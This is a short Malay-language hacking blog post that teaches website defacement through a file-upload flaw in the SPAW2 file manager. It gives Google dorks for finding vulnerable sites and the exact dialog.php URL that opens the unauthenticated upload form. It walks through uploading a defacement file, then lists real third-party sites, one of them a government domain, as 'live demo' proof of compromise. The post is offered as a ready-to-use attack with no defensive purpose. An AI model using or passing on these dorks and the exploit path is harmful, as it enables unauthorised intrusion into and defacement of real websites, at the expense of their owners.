Asslam. dan selamat pagi!! .. hari ini admin nk share satu hack... ^_^ .. sempena hari jadi Admin Hari ini.. rase smgt pulk nk wat News pos ... heheheh ok hari ini admin nk tujukan Hack
SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY
Jom Start!!
1. Masukkan salah satu Dork ini di Google search
= inurl:Spaw2/dialogs/
= Inurl:spaw2/uploads/files \
= Index of:/Spaw2/uploads/files
2.Pilih satu website dan masukan exploit dihujung URL... dan tekan enter.
Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Contoh: www.[localhost].com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Note : Kotak hitam : pilih Image or Files or Create Folder
Kotak merah: upload file deface korag..
Kotak hijau : tekn upload utok upload file deface korag :)
4.Untok lihat deface korang tgok dekat Kotak Biru dan klik dia akan auto Tab dah deface korag akan keluar ^_^
Siap ^_^... harap korang semua gembira yer ^_^
Live Demo By Mr.Ubuntu CH/SH
http://www.oracle-ilnews.com/spaw2/uploads/files/Mr.UbuntuCH.html
http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/Mr.Ubuntu%20%20CH_SH.txt
http://www.sunbelt-chiangmai.com/spaw2/uploads/files/Mr.Ubuntu%20CH_SH.html
http://www-old.dtam.moph.go.th/admin/spaw2/uploads/files/Mr.UbuntuCH_SH.html
http://www.medinacreativehousing.com/template/spaw2/uploads/files/Mr.UbuntuCH_SH.html
http://www.orlandobarreto.adv.br/spaw2/uploads/images/Mr.UbuntuCH_SH%20_1.jpg
http://ilioslighting.com/admin/spaw2/uploads/files/Mr.UbuntuCH_SH%20.jpg
http://www.improvinghealthcolorado.org/files/images/Mr.UbuntuCH_SH%20.jpg
http://www.uniaks.ru/spaw2/uploads/files/Mr.UbuntuCH_SH.html
Credit To :Mr.Ubuntu CH/SH & Noentry PHC ^_^
